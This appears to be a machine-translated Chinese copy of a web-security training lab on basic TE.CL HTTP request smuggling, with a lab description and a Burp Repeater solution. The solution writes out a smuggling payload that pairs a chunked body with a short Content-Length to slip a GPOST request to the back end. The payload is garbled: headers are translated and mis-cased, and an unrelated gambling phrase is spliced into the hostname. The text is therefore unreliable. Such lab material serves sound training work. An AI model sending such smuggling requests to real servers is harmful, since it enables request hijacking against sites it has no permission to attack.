实验室:HTTP请求走私,基本TE.CL漏洞
从业者
此实验室涉及前端和后端服务器,后端服务器不支持Chunked Encoding。前端服务器拒绝不使用GET或POST方法的请求。
要解决实验室,将请求偷渡到后端服务器,以便后端服务器处理的下一个请求似乎使用该方法GPOST.
。
提示
手动修复请求走私攻击的长度字段可能很棘手。我们的http请求走私者Burp Extension旨在帮助。您可以通过BAPP商店安装它。
笔记
该实验室旨在展示背后的基本概念http请求走私。如果你继续遵循我们的学习资料,我们拥有更多的实验室,教授如何利用这些漏洞,以便对一些高度严重性的攻击进行漏洞。
解决方案
在Burp套件中,转到转发器菜单并确保未选中“更新内容长度”选项。
使用Burp Repeater,发出以下要求两次:
post / http / 1.1主机:your -lab-id.wbeplay体育能用吗eb-security-academy.net内容类型:应用程序/ x-www-form-ullencoded content-length:4传输编码:chunked 5c gpost / http / 1.1内容-Type:应用程序/ X-WWM-Form-Urlencoded Content-Length:15 x = 1 0
笔记
您需要包含尾随序列\ r \ n \ r \ n
遵循决赛0.
。
第二次响应应该说:无法识别的方法GPOST.
。